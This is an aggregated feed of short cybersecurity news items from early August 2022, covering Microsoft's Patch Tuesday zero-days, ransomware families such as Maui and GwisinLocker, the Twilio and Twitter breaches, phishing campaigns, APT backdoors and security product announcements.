                The post Chinese actors behind attacks on industrial enterprises and public institutions appeared first on Security Affairs.


                Autosummary: The Portdoor backdoor implements multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, and AES-encrypted data exfiltration.


                Microsoft patches Windows DogWalk zero-day exploited in attacks

                exploits
                2022-08-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-patches-windows-dogwalk-zero-day-exploited-in-attacks/
                Microsoft has released security updates to address a high severity Windows zero-day vulnerability with publicly available exploit code and abused in attacks. [...]



                Microsoft August 2022 Patch Tuesday fixes exploited zero-day, 121 flaws

                exploits
                2022-08-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-august-2022-patch-tuesday-fixes-exploited-zero-day-121-flaws/
                Today is Microsoft's August 2022 Patch Tuesday, and with it comes fixes for the actively exploited "DogWalk" zero-day vulnerability and a total of 121 flaws. [...]



                Microsoft fixes exploited zero-day in Windows Support Diagnostic Tool (CVE-2022-34713)

                exploits
                2022-08-09 https://www.helpnetsecurity.com/2022/08/09/cve-2022-34713/

                The August 2022 Patch Tuesday has arrived, with fixes for an unexpectedly high number of vulnerabilities in various Microsoft products, including two zero-days: one actively exploited (CVE-2022-34713) and one not yet (CVE-2022-30134). Vulnerabilities to prioritize CVE-2022-34713 is a vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) that allows for remote code execution. For an attacker to exploit it, they must trick targets into opening a specially crafted file (delivered via email or downloaded from a … More

                The post Microsoft fixes exploited zero-day in Windows Support Diagnostic Tool (CVE-2022-34713) appeared first on Help Net Security.


                Autosummary: More importantly, it seems, three other critical elevation of privilege vulnerabilities affecting Exchange – CVE-2022-24477, CVE-2022-24516, CVE-2022-21980 – have been patched by Microsoft.


                Experts linked Maui ransomware to North Korean Andariel APT

                exploits ransomware
                2022-08-09 https://securityaffairs.co/wordpress/134195/malware/maui-ransomware-andariel-apt.html

                Cybersecurity researchers from Kaspersky linked, with medium confidence, the Maui ransomware operation to the North Korea-backed APT group Andariel, which is considered a division of the Lazarus APT Group. North Korean nation-state actors used Maui ransomware to encrypt servers providing healthcare services, including electronic […]

                The post Experts linked Maui ransomware to North Korean Andariel APT appeared first on Security Affairs.




                CISA warns of Windows and UnRAR flaws exploited in the wild

                exploits
                2022-08-09 https://www.bleepingcomputer.com/news/security/cisa-warns-of-windows-and-unrar-flaws-exploited-in-the-wild/
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two more flaws to its catalog of Known Exploited Vulnerabilities, based on evidence of active exploitation. [...]

                Autosummary: The problem came back to public attention this year by security researcher j00sean, who summarized what an attacker could achieve by exploiting it and provided video proof: Successful exploitation requires user interaction, an obstacle easy to surpass through social engineering, especially in email and web-based attacks, Microsoft says in an advisory today:


                Microsoft: Exchange ‘Extended Protection’ needed to fully patch new bugs

                exploits
                2022-08-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-extended-protection-needed-to-fully-patch-new-bugs/
                Microsoft says that some of the Exchange Server flaws addressed as part of the August 2022 Patch Tuesday also require admins to manually enable Extended Protection on affected servers to fully block attacks. [...]



                Can your EDR handle a ransomware attack? 6-point checklist for an anti-ransomware EDR

                exploits ransomware
                2022-08-09 https://www.malwarebytes.com/blog/business/2022/08/can-your-edr-handle-a-ransomware-attack-6-point-checklist-for-an-anti-ransomware-edr

                Categories: Business

                In this post, a cybersecurity expert gives his 6-point checklist of features your EDR should have to stop ransomware.


                The post Can your EDR handle a ransomware attack? 6-point checklist for an anti-ransomware EDR appeared first on Malwarebytes Labs.


                Autosummary: Businesses, especially small-to-medium sized ones with limited budget or IT resources, need to make sure that their EDR is cost-effective, easy-to-use, and able to reliably stop the growing ransomware threat. In this post, Robert Zamani, Regional Vice President, Americans Solutions Engineering at Malwarebytes, gives his 6-point checklist of features your EDR should have to stop ransomware. To avoid unnecessary complexity in figuring out the origin of a ransomware threat, your EDR solution should have an industry standardized way of describing the attack—such as MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge). “Your ransomware rollback should store changes to data files on the system in a local cache for 72 hours (no ransomware actually exceeds 24 hours), which can be used to help revert changes caused by ransomware,” Zamani says. Thorough containment, eradication, and recovery options: look to an EDR to mitigate unforeseen threats and ultimately a new method of ransomware (exploitation of trust), says Zamani.


                Twitter data breach affects 5.4M users

                financial
                2022-08-09 https://www.malwarebytes.com/blog/news/2022/08/twitter-confirmed-july-2022-data-breach-affecting-5.4m-users

                Categories: Privacy

                Twitter has confirmed a data breach on July 2.


                The post Twitter data breach affects 5.4M users appeared first on Malwarebytes Labs.


                Autosummary: “We want to let you know about a vulnerability that allowed someone to enter a phone number or email address into the log-in flow in the attempt to learn if that information was tied to an existing Twitter account, and if so, which specific account.”


                guardDog.ai partners with VMware to protect users and networks from attempted cyberattacks

                ciber
                2022-08-09 https://www.helpnetsecurity.com/2022/08/10/guarddog-ai-vmware/

                As the provider of real-time cyber security protection for business and consumers, guardDog.ai is using VMware’s Tanzu containerization technology to support hardware-free and entirely remote deployment and management of cyber security protection for any size MSSP or organization. guardDog’s subscription-based Fido technology uses patent-pending artificial intelligence from the company’s cloud-based Autonomous Incident Response (AiR) database to pre-emptively recognize all devices connected to a network (including most especially the IoT and smart device connections device management … More

                The post guardDog.ai partners with VMware to protect users and networks from attempted cyberattacks appeared first on Help Net Security.


                Autosummary: These include the myriad of IoT (Internet of Things) devices such as specialized health monitoring equipment, printers, doorbells, thermostats, smart refrigerators, smart pens, smart TVs, and game systems that are inherently vulnerable to the networks they join.


                IDEX Biometrics and Reltime collaborate to launch Web3 biometric payment card

                industry
                2022-08-09 https://www.helpnetsecurity.com/2022/08/10/idex-biometrics-reltime/

                IDEX Biometrics and Reltime formed a partnership to jointly develop and market Web3 biometric payment card including cold storage and digital asset wallets, combined with digital identification. This all-in-one, EMV compliant biometric payment card is anticipated to reach the market in the first half of 2023. The biometric solution based on IDEX Biometrics sensor technology will enable EMV compliant payments alongside Reltime’s global Web3 financial ecosystem’s unique “check-out” feature. Securing fiat and digital asset transactions … More

                The post IDEX Biometrics and Reltime collaborate to launch Web3 biometric payment card appeared first on Help Net Security.

                "

                Autosummary: "


                Microsoft Patch Tuesday for August 2022 fixed actively exploited zero-day

                exploits
                2022-08-09 https://securityaffairs.co/wordpress/134211/security/microsoft-patch-tuesday-august-2022.html

                Microsoft Patch Tuesday security updates for August 2022 addressed a zero-day attack remote code execution vulnerability in Windows. Microsoft Patch Tuesday security updates for August 2022 addressed 118 CVEs in multiple products, including .NET Core, Active Directory Domain Services, Azure Batch Node Agent, Azure Real Time Operating System, Azure Site Recovery, Azure Sphere, Microsoft ATA […]

                The post Microsoft Patch Tuesday for August 2022 fixed actively exploited zero-day appeared first on Security Affairs.

                "

                Autosummary: "


                Summer of exploitation leads to healthcare under fire

                exploits
                2022-08-09 https://www.malwarebytes.com/blog/news/2022/08/summer-of-exploitation-leads-to-healthcare-under-fire

                Categories: News

                Categories: Threat Intelligence

                Tags: Healthcare

                Tags: Medical

                Read about trends in cyberattacks in the Healthcare and Medical industry, as well as our recommendations for helping to secure your healthcare organization.

                (Read more...)

                The post Summer of exploitation leads to healthcare under fire appeared first on Malwarebytes Labs.

                "

                Autosummary: Quickly patching vulnerabilities is a high priority, however given that quick patching isn’t always an option, times like these require risk reduction, such as removing non-patchable endpoints from direct Internet access, creating additional layers of authentication to access high value systems, and a thorough review of user accounts and permissions, to tighten up who has access to what. "


                Education hammered by exploits and backdoors in 2021 and 2022

                exploits
                2022-08-09 https://www.malwarebytes.com/blog/news/2022/08/education-hammered-by-exploits-and-backdoors-in-2021-2022

                Categories: News

                Categories: Threat Intelligence

                Tags: Education

                Beyond spikes in detections, the education sector has dealt with an onslaught of attacks ranging from spyware and denial of service tools to ransomware.

                (Read more...)

                The post Education hammered by exploits and backdoors in 2021 and 2022 appeared first on Malwarebytes Labs.

                "

                Autosummary: The first half of 2021 saw attacks against schools in Florida, New York, Oregon, Massachusetts, and California, while the second half saw attacks against Texas, Washington D.C., Wisconsin, and Illinois. In a lot of cases, organizations may have a difficult time updating quickly, because of operational needs, but in the case of schools, a single vulnerability might be duplicated across 99% of its endpoints, which turns each of those systems into backdoors for the bad guys. "


                Cyberattacks on healthcare organizations negatively impact patient care

                ciber
                2022-08-08 https://www.helpnetsecurity.com/2022/08/08/cyberattacks-healthcare-impact/

                Cynerio and the Ponemon Institute have examined the current impact of cyberattacks on healthcare facilities and network-connected IoT and medical devices, and found multiple alarming trends. Among other things, the survey has also revealed that almost half of hospitals have been attacked with ransomware, and that 76% of victimized hospitals were attacked 3 or more times. Key report findings The Insecurity of Connected Devices in HealthCare 2022 Report surveyed 517 experts in leadership positions at … More

                The post Cyberattacks on healthcare organizations negatively impact patient care appeared first on Help Net Security.

                "

                Autosummary: Perceived risk in IoT/IoMT devices is high, but proactive security actions and accountability are not. 71% of respondents rated the security risks presented by IoT/IoMT devices as high or very high, while only 21% report a mature stage of proactive security actions. "


                Data privacy regulation a top three challenge for IoT adopters

                industry
                2022-08-08 https://www.helpnetsecurity.com/2022/08/08/data-privacy-regulation-challenge-iot-adopters/

                Fears over security have become less of a concern for organizations adopting IoT solutions than it was five years ago, according to a recent study by Wi-SUN Alliance, a global member-based association of industry leading companies driving the adoption of interoperable wireless solutions for use in smart cities, smart utilities, IoT and industrial IoT (IIoT) applications. The Journey to IoT Maturity, a follow-up to Wi-SUN’s ‘state of the nation’ IoT study in 2017, is based … More

                The post Data privacy regulation a top three challenge for IoT adopters appeared first on Help Net Security.

                "

                Autosummary: The Journey to IoT Maturity, a follow-up to Wi-SUN’s ‘state of the nation’ IoT study in 2017, is based on interviews with IT decision makers from UK and US IoT adopters within key industries, including energy and utilities, state and local government, construction, technology, and telecommunications. "


                Could criminalizing ransomware payments put a stop to the current crime wave?

                exploits ransomware
                2022-08-08 https://www.helpnetsecurity.com/2022/08/08/criminalizing-ransomware-payments-video/

                In this Help Net Security video, Charl van der Walt, Head of Security Research, Orange Cyberdefense, discusses whether criminalizing ransomware payments could quell the current crime wave by cutting off the flow of funds that motivates cybercriminals.

                The post Could criminalizing ransomware payments put a stop to the current crime wave? appeared first on Help Net Security.

                "

                Autosummary: "


                Attackers abuse open redirects in Snapchat and Amex in phishing attacks

                financial
                2022-08-08 https://securityaffairs.co/wordpress/134131/cyber-crime/snapchat-amex-open-redirects-phishing.html

                Threat actors abuse open redirects on Snapchat and American Express to launch phishing attacks against Microsoft 365 users. Attackers abused open redirects on the websites of Snapchat and American Express as part of a phishing campaign targeting Microsoft 365 users. The term Open URL redirection, open redirects, refers to a security issue that makes it […]

                The post Attackers abuse open redirects in Snapchat and Amex in phishing attacks appeared first on Security Affairs.

                "

                Autosummary: “When examining links, surfers should keep an eye out for URLs that include, for example, “url=”, “redirect=”, “external-link”, or “proxy”. "


                Banks face a WhatsApp reckoning as regulators clamp down on messaging apps

                financial
                2022-08-08 https://www.computerworld.com/article/3668574/banks-face-a-whatsapp-reckoning-as-regulators-clamp-down-on-messaging-apps.html#tk.rss_security

                As regulators hand out hundreds of millions of dollars in fines for record-keeping failures related to the use of social messaging platforms such as WhatsApp, the finance industry faces a choice: properly enforce bans on the use of these apps or find ways to make them compliant.

                “The explosion of new electronic communications channels — and the pervasive use of these — raises lots of red flags for the regulators,” said Anthony Diana, a partner at law firm Reed Smith’s Tech & Data Group. “The fear is that, if bad things are happening, they're happening on these personal apps, not on the sanctioned communication channels that are surveilled.”


                Anthony Diana, a partner at law firm Reed Smith’s Tech & Data Group.


                "

                Autosummary: “We have a module in our surveillance platform that looks specifically for words like, ‘Let's move this to WhatsApp, or to Telegram,’ ‘Ping me on Signal,’ or whatever it might be,” said Brian Lynch, president of US operations at SteelEye, a compliance monitoring and reporting software vendor. “A firm can choose which way it wants to go, but it can't just be, ‘We're going to ban it,’ versus ‘We're going to allow it,’” said John Lukanski, a partner in Reed Smith’s Financial Industry Group. “Addressing regulatory requirements around capturing, archiving, and monitoring the use of mobile communications is a difficult problem,” said Raúl Castañón, senior analyst at 451 Research, a division of S&P Global Market Intelligence. By capturing WhatsApp conversations, the data can be made available for e-discovery and monitoring, just like any other channel, said Shiran Weitzman, CEO of Shield, a communication compliance software vendor. Some of the main vendors offering WhatsApp capture include Guardec, LeapXpert, Movius, Symphony, TeleMessage, and Voxsmart. Movius, which also sells software to monitor and record voice calls, SMS, and WhatsApp messages on mobile devices, counts JPMorgan Chase and UBS among its customers. "


                Twilio discloses data breach after SMS phishing attack on employees

                financial
                2022-08-08 https://www.bleepingcomputer.com/news/security/twilio-discloses-data-breach-after-sms-phishing-attack-on-employees/
                Cloud communications company Twilio says some of its customers' data was accessed by attackers who breached internal systems after stealing employee credentials in an SMS phishing attack. [...] "

                Autosummary: To do that, they impersonated Twilio's IT department, asking them to click URLs containing "Twilio," "Okta," and "SSO" keywords that would redirect them to a Twilio sign-in page clone. "


                7-Eleven stores in Denmark closed due to a cyberattack

                ciber
                2022-08-08 https://www.bleepingcomputer.com/news/security/7-eleven-stores-in-denmark-closed-due-to-a-cyberattack/
                7-Eleven stores in Denmark shut down today after a cyberattack disrupted stores' payment and checkout systems throughout the country. [...] "

                Autosummary: "


                Chinese hackers use new Windows malware to backdoor govt, defense orgs

                exploits
                2022-08-08 https://www.bleepingcomputer.com/news/security/chinese-hackers-use-new-windows-malware-to-backdoor-govt-defense-orgs/
                An extensive series of attacks detected in January used new Windows malware to backdoor government entities and organizations in the defense industry from several countries in Eastern Europe. [...] "

                Autosummary: "The attack targeted industrial plants, design bureaus and research institutes, government agencies, ministries and departments in several East European countries (Belarus, Russia, and Ukraine), as well as Afghanistan," Kaspersky ICS CERT researchers said. "


                Researchers Uncover Classiscam Scam-as-a-Service Operations in Singapore

                financial
                2022-08-08 https://thehackernews.com/2022/08/researchers-uncover-classiscam-scam-as.html
                A sophisticated scam-as-a-service operation dubbed Classiscam has now infiltrated into Singapore, more than 1.5 years after expanding to Europe. "Scammers posing as legitimate buyers approach sellers with the request to purchase goods from their listings and the ultimate aim of stealing payment data," Group-IB said in a report shared with The Hacker News. The cybersecurity firm called the "

                Autosummary: There are believed to be over 90 active groups using Classiscam's services to target users in Bulgaria, the Czech Republic, France, Kazakhstan, Kirghizia, Poland, Romania, Ukraine, the U.S. and Uzbekistan. Other sites in the network pose as Singaporean moving companies, European, Asian, and Middle Eastern classified websites, banks, marketplaces, food and crypto brands, and delivery companies. "


                LogoKit update – The phishing kit leveraging Open Redirect Vulnerabilities

                financial
                2022-08-08 https://securityaffairs.co/wordpress/134141/hacking/logokit-phishing-open-redirect.html

                LogoKit – Threat actors leveraging Open Redirect Vulnerabilities popular in online services and apps to bypass spam filters in phishing campaigns. Resecurity, Inc. (USA), a Los Angeles-based cybersecurity company providing managed threat detection and response for Fortune 500’s, identified threat actors leveraging Open Redirect Vulnerabilities popular in online services and apps to bypass spam filters […]

                The post LogoKit update – The phishing kit leveraging Open Redirect Vulnerabilities appeared first on Security Affairs.

                "

                Autosummary: Notably, the actors prefer to use domain names in exotic jurisdictions or zones with relatively poor abuse management processes (.gq, .ml, .tk, .ga, .cf), or to gain unauthorized access to legitimate web resources and then use them as hosting for further phishing distribution. "


                Twilio discloses data breach that impacted customers and employees

                financial
                2022-08-08 https://securityaffairs.co/wordpress/134147/data-breach/twilio-discloses-data-breach.html

                Communications company Twilio discloses a data breach after threat actors have stolen employee credentials in an SMS phishing attack. Communications company Twilio discloses a data breach, threat actors had access to the data of some of its customers. The attackers accessed company systems using employee credentials obtained through a sophisticated SMS phishing attack. Twilio is […]

                The post Twilio discloses data breach that impacted customers and employees appeared first on Security Affairs.

                "

                Autosummary: The URLs in the messages included words like “Twilio,” “Okta,” and “SSO” in the attempt to trick users into clicking on a link redirecting them to a landing page that impersonated Twilio’s sign-in page. "


                deBridge Finance crypto platform targeted by Lazarus hackers

                financial
                2022-08-08 https://www.bleepingcomputer.com/news/security/debridge-finance-crypto-platform-targeted-by-lazarus-hackers/
                Hackers suspected to be from the North Korean Lazarus group tried their luck at stealing cryptocurrency from deBridge Finance, a cross-chain protocol that enables the decentralized transfer of assets between various blockchains. [...] "

                Autosummary: In a thread on Twitter, Smirnov explains that the LNK file executes the Command Prompt with the following command that retrieves a payload from a remote location: Command for fetching malicious script source: Alex Smirnov The script was created to show a Notepad with the “pdf password: salary2022” and to check if the compromised system is protected by a security solution from ESET, Tencent, or Bitdefender. "


                New IoT RapperBot Malware Targeting Linux Servers via SSH Brute-Forcing Attack

                exploits industry
                2022-08-07 https://thehackernews.com/2022/08/new-iot-rapperbot-malware-targeting.html
                A new IoT botnet malware dubbed RapperBot has been observed rapidly evolving its capabilities since it was first discovered in mid-June 2022. "This family borrows heavily from the original Mirai source code, but what separates it from other IoT malware families is its built-in capability to brute force credentials and gain access to SSH servers instead of Telnet as implemented in Mirai," "

                Autosummary: "Since mid-July, RapperBot has switched from self-propagation to maintaining remote access into the brute-forced SSH servers," the researchers said. "


                Phishy calls and emails play on energy cost increase fears

                industry
                2022-08-07 https://blog.malwarebytes.com/cybercrime/2022/08/phishy-calls-and-emails-play-on-energy-cost-increase-fears/

                We take a look at a wave of scams involving people's fears of increasing energy prices, and how to avoid being caught out.

                The post Phishy calls and emails play on energy cost increase fears appeared first on Malwarebytes Labs.

                "

                Autosummary: If you receive an unexpected call about energy prices or rebates, insist on calling “them” back directly on their official number, taken from an official website. Posted: August 7, 2022. We take a look at a wave of scams involving people's fears of increasing energy prices, and how to avoid being caught out. "


                GwisinLocker ransomware exclusively targets South Korea

                exploits ransomware
                2022-08-07 https://securityaffairs.co/wordpress/134105/cyber-crime/gwisinlocker-ransowmare-south-korea.html

                Researchers spotted a new family of ransomware, named GwisinLocker, that encrypts Windows and Linux ESXi servers. Researchers warn of a new ransomware called GwisinLocker which is able to encrypt Windows and Linux ESXi servers. The ransomware targets South Korean healthcare, industrial, and pharmaceutical companies, its name comes from the name of the author ‘Gwisin’ (ghost […]

                The post GwisinLocker ransomware exclusively targets South Korea appeared first on Security Affairs.

                "

                Autosummary: "


                Serious cyberattack hits German Chambers of Industry and Commerce (DIHK)

                industry ciber
                2022-08-07 https://securityaffairs.co/wordpress/134121/hacking/dihk-cyberattack.html

                A massive cyberattack hit the website of the German Chambers of Industry and Commerce (DIHK) this week. A massive attack hit the website of the German Chambers of Industry and Commerce (DIHK) forcing the organization to shut down its IT systems as a precautionary measure for security reasons. “Due to a possible cyber attack, the […]

                The post Serious cyberattack hits German Chambers of Industry and Commerce (DIHK) appeared first on Security Affairs.

                "

                Autosummary: "


                Snapchat, Amex sites abused in Microsoft 365 phishing attacks

                financial
                2022-08-07 https://www.bleepingcomputer.com/news/security/snapchat-amex-sites-abused-in-microsoft-365-phishing-attacks/
                Attackers abused open redirects on the websites of Snapchat and American Express in a series of phishing attacks to steal Microsoft 365 credentials. [...] "

                Autosummary: "


                Phishy calls and emails play on energy cost increase fears

                industry
                2022-08-07 https://www.malwarebytes.com/blog/news/2022/08/blog-post

                Categories: News

                Categories: Scams

                Tags: scam

                Tags: phish

                Tags: email

                Tags: social engineering

                Tags: gas

                Tags: electricity

                Tags: energy company

                Tags: rebate

                Tags: discount

                Tags: switch

                We take a look at a wave of scams involving people's fears of increasing energy prices, and how to avoid being caught out.

                (Read more...)

                The post Phishy calls and emails play on energy cost increase fears appeared first on Malwarebytes Labs.

                "

                Autosummary: If you receive an unexpected call about energy prices or rebates, insist on calling "them" back directly on their official number, taken from an official website. Posted: August 6, 2022. We take a look at a wave of scams involving people's fears of increasing energy prices, and how to avoid being caught out. "


                Hackers Exploit Twitter Vulnerability to Exposes 5.4 Million Accounts

                exploits
                2022-08-06 https://thehackernews.com/2022/08/hackers-exploit-twitter-vulnerability.html
                Twitter on Friday revealed that a now-patched zero-day bug was used to link phone numbers and emails to user accounts on the social media platform. "As a result of the vulnerability, if someone submitted an email address or phone number to Twitter's systems, Twitter's systems would tell the person what Twitter account the submitted email addresses or phone number was associated with, if any," "

                Autosummary: "


                Slack Resets Passwords After a Bug Exposed Hashed Passwords for Some Users

                exploits
                2022-08-06 https://thehackernews.com/2022/08/slack-resets-passwords-after-bug.html
                Slack said it took the step of resetting passwords for about 0.5% of its users after a flaw exposed salted password hashes when creating or revoking shared invitation links for workspaces. "When a user performed either of these actions, Slack transmitted a hashed version of their password to other workspace members," the enterprise communication and collaboration platform said in an alert on 4th "

                Autosummary: "


                New GwisinLocker ransomware encrypts Windows and Linux ESXi servers

                exploits ransomware
                2022-08-06 https://www.bleepingcomputer.com/news/security/new-gwisinlocker-ransomware-encrypts-windows-and-linux-esxi-servers/
                A new ransomware family called "GwisinLocker" targets South Korean healthcare, industrial, and pharmaceutical companies with Windows and Linux encryptors, including support for encrypting VMware ESXi servers and virtual machines. [...] "

                Autosummary: The command-line arguments for the GwisinLocker Linux encryptor are listed below: Usage: -h, --help show this help message and exit. Options: -p, --vp= Comma-separated list of paths to encrypt; -m, --vm= Kills VM processes if 1, stops services and processes if 2; -s, --vs= Seconds to sleep before execution; -z, --sf= Skip encrypting ESXi-related files (those excluded in the configuration). "


                Greek intelligence service used surveillance malware to spy on a journalist, Reuters reports

                exploits
                2022-08-06 https://securityaffairs.co/wordpress/134097/intelligence/greek-intelligence-surveillance-malware.html

                Greek intelligence admitted it had spied on a journalist, while citizens ask the government to reveal the use of surveillance malware. The head of the Greek intelligence told a parliamentary committee that they had spied on a journalist with surveillance malware, Reuters reported citing two sources present. The revelation comes while media and journalists are […]

                The post Greek intelligence service used surveillance malware to spy on a journalist, Reuters reports appeared first on Security Affairs.

                "

                Autosummary: "


                MI-X: Open source project helps you understand whether you are exploitable

                exploits
                2022-08-05 https://www.helpnetsecurity.com/2022/08/05/mi-x-open-source-video/

                In this Help Net Security video, Ofri Ouzan, Security Researcher at Rezilion, talks about MI-X (Am I Exploitable?), an open source tool aimed at effectively determining whether a local host or a running container image is truly vulnerable to a specific vulnerability by accounting for all factors which affect actual exploitability. The tool prints the logical steps it takes in order to reach a decision and can generate a flow chart depicting the complete logical … More

                The post MI-X: Open source project helps you understand whether you are exploitable appeared first on Help Net Security.

                "

                Autosummary: "


                VIPRE Endpoint Detection and Response protects SMBs against malware and other malicious attacks

                exploits
                2022-08-05 https://www.helpnetsecurity.com/2022/08/05/vipre-endpoint-detection-and-response/

                VIPRE Security Group announced it is preparing to add a new cybersecurity tool to its comprehensive suite of offerings. The new solution, VIPRE Endpoint Detection and Response (EDR), was designed to help small and medium-sized businesses (SMBs) and IT partners navigate the complexities of EDR management from a single, easy-to-use console. While VIPRE EDR will be available publicly this fall, the company is ready to launch its Beta program and seeks users to test the … More

                The post VIPRE Endpoint Detection and Response protects SMBs against malware and other malicious attacks appeared first on Help Net Security.

                "

                Autosummary: Understand how and when a potential threat impacted your systems, including all aspects of endpoint activity related to the threat – all user, process, file, registry, and network activity. "


                CISA Adds Zimbra Email Vulnerability to its Exploited Vulnerabilities Catalog

                exploits
                2022-08-05 https://thehackernews.com/2022/08/cisa-adds-zimbra-email-vulnerability-to.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a recently disclosed high-severity vulnerability in the Zimbra email suite to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation. The issue in question is CVE-2022-27924 (CVSS score: 7.5), a command injection flaw in the platform that could lead to the execution of arbitrary "

                Autosummary: "


                A Growing Number of Malware Attacks Leveraging Dark Utilities "C2-as-a-Service"

                exploits
                2022-08-05 https://thehackernews.com/2022/08/a-growing-number-of-malware-attacks.html
                A nascent service called Dark Utilities has already attracted 3,000 users for its ability to provide command-and-control (C2) services with the goal of commandeering compromised systems. "It is marketed as a means to enable remote access, command execution, distributed denial-of-service (DDoS) attacks and cryptocurrency mining operations on infected systems," Cisco Talos said in a report shared "

                Autosummary: "


                Facebook finds new Android malware used by APT hackers

                exploits
                2022-08-05 https://www.bleepingcomputer.com/news/security/facebook-finds-new-android-malware-used-by-apt-hackers/
                Meta (Facebook) has released its Q2 2022 adversarial threat report, and among the highlights is the discovery of two cyber-espionage clusters connected to hacker groups known as "Bitter APT" and APT36 (aka "Transparent Tribe") using new Android malware. [...] "

                Autosummary: "Bitter injected Dracarys into trojanized (non-official) versions of YouTube, Signal, Telegram, WhatsApp, and custom chat applications capable of accessing call logs, contacts, files, text messages, geolocation, device information, taking photos, enabling microphone, and installing apps," explained Meta's report. "


                FCC warns of steep rise in phishing over SMS

                financial
                2022-08-05 https://blog.malwarebytes.com/social-engineering/2022/08/fcc-warns-of-steep-rise-in-phishing-over-sms/

                Smishing attacks, or phishing attempts via SMS, are on the rise, and Americans are fighting off billions of spam messages each month.

                The post FCC warns of steep rise in phishing over SMS appeared first on Malwarebytes Labs.

                "

                Autosummary: How to protect yourself from #scam robotexts: ▪️ Do not respond ▪️ Do not click on any links ▪️ Do not provide any info ▪️ File an FCC complaint ▪️ Forward unwanted texts to SPAM (7726) ▪️ Delete all suspicious texts — The FCC (@FCC) July 28, 2022 When you receive a spam text, do not engage with the sender. "


                Iranian Hackers likely Behind Disruptive Cyberattacks Against Albanian Government

                government ciber
                2022-08-05 https://thehackernews.com/2022/08/iranian-hackers-likely-behind.html
                A threat actor working to further Iranian goals is said to have been behind a set of disruptive cyberattacks against Albanian government services in mid-July 2022. Cybersecurity firm Mandiant said the malicious activity against a NATO state represented a "geographic expansion of Iranian disruptive cyber operations." The July 17 attacks, according to Albania's National Agency of Information "

                Autosummary: "


                CISA adds Zimbra email bug to Known Exploited Vulnerabilities Catalog

                exploits
                2022-08-05 https://securityaffairs.co/wordpress/134058/security/zimbra-known-exploited-vulnerabilities-catalog.html

                US Critical Infrastructure Security Agency (CISA) adds a recently disclosed flaw in the Zimbra email suite to its Known Exploited Vulnerabilities Catalog. The Cybersecurity & Infrastructure Security Agency (CISA) has added a recently disclosed flaw in the Zimbra email suite, tracked as CVE-2022-27924, to its Known Exploited Vulnerabilities Catalog. In mid-June, researchers from Sonarsource discovered […]

                The post CISA adds Zimbra email bug to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                Hackers are actively exploiting password-stealing flaw in Zimbra

                exploits
                2022-08-05 https://www.bleepingcomputer.com/news/security/hackers-are-actively-exploiting-password-stealing-flaw-in-zimbra/
                The Cybersecurity and Infrastructure Security Agency (CISA) has added the Zimbra CVE-2022-27824 flaw to its "Known Exploited Vulnerabilities Catalog," indicating that it is actively exploited in attacks by hackers. [...] "

                Autosummary: "


                Twitter confirms zero-day used to expose data of 5.4 million accounts

                exploits
                2022-08-05 https://www.bleepingcomputer.com/news/security/twitter-confirms-zero-day-used-to-expose-data-of-54-million-accounts/
                Twitter has confirmed a recent data breach was caused by a now-patched zero-day vulnerability used to link email addresses and phone numbers to users' accounts, allowing a threat actor to compile a list of 5.4 million user account profiles. [...] "

                Autosummary: Twitter confirms zero-day used to collect data Today, Twitter has confirmed that the vulnerability used by the threat actor in December is the same one reported to and fixed by them in January 2022 as part of their HackerOne bug bounty program. "In January 2022, we received a report through our bug bounty program of a vulnerability that allowed someone to identify the email or phone number associated with an account or, if they knew a person's email or phone number, they could identify their Twitter account, if one existed," Twitter disclosed in a security advisory today. "


                UK NHS suffers outage after cyberattack on managed service provider

                ciber
                2022-08-05 https://www.bleepingcomputer.com/news/security/uk-nhs-suffers-outage-after-cyberattack-on-managed-service-provider/
                United Kingdom's National Health Service (NHS) 111 emergency services are affected by a major outage triggered by a cyberattack that hit the systems of managed service provider (MSP) Advanced. [...] "

                Autosummary: "


                The Week in Ransomware - August 5th 2022 - A look at cyber insurance

                exploits ransomware
                2022-08-05 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-5th-2022-a-look-at-cyber-insurance/
                For the most part, it has been a quiet week on the ransomware front, with a few new reports, product developments, and attacks revealed. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @malwrhunterteam, @DanielGallagher, @FourOctets, @struppigel, @VK_Intel, @Ionut_Ilascu, @demonslay335, @BleepinComputer, @Seifreed, @PolarToffee, @malwareforme, @jorntvdw, @fwosar, @LawrenceAbrams, @serghei, @secuninja, @pcrisk, @siri_urz, @Dschwarcz, @Balgan, and @Mandiant. "


                ActZero releases Blueprint for Ransomware Defense to improve cybersecurity posture for enterprises

                exploits ransomware ciber
                2022-08-05 https://www.helpnetsecurity.com/2022/08/06/actzero-blueprint-for-ransomware-defense/

                ActZero has launched the Ransomware Task Force’s (RTF) “Blueprint for Ransomware Defense”. Aimed at small- and medium-sized enterprises (SMEs) that have limited cybersecurity expertise, the Blueprint provides a set of achievable ransomware safeguards to harden their IT environments. ActZero contributed to the development of the Blueprint, and is actively engaging with its clients, partners, and prospects to encourage adoption. The RTF’s 2021 report called for the cybersecurity community to “develop a clear, actionable framework for … More

                The post ActZero releases Blueprint for Ransomware Defense to improve cybersecurity posture for enterprises appeared first on Help Net Security.

                "

                Autosummary: The RTF’s 2021 report called for the cybersecurity community to “develop a clear, actionable framework for ransomware mitigation, response, and recovery”. "


                Twitter confirms zero-day used to access data of 5.4 million accounts

                exploits
                2022-08-05 https://securityaffairs.co/wordpress/134087/data-breach/twitter-zero-day-data-leak.html

                Twitter confirmed that the recent data breach that exposed data of 5.4 million accounts was caused by the exploitation of a zero-day flaw. At the end of July, a threat actor leaked data of 5.4 million Twitter accounts that were obtained by exploiting a now-fixed vulnerability in the popular social media platform. The threat actor offered […]

                The post Twitter confirms zero-day used to access data of 5.4 million accounts appeared first on Security Affairs.

                "

                Autosummary: “In January 2022, we received a report through our bug bounty program of a vulnerability that allowed someone to identify the email or phone number associated with an account or, if they knew a person’s email or phone number, they could identify their Twitter account, if one existed,” continues the social media firm. "


                How can organizations stay ahead of cybersecurity challenges?

                ciber
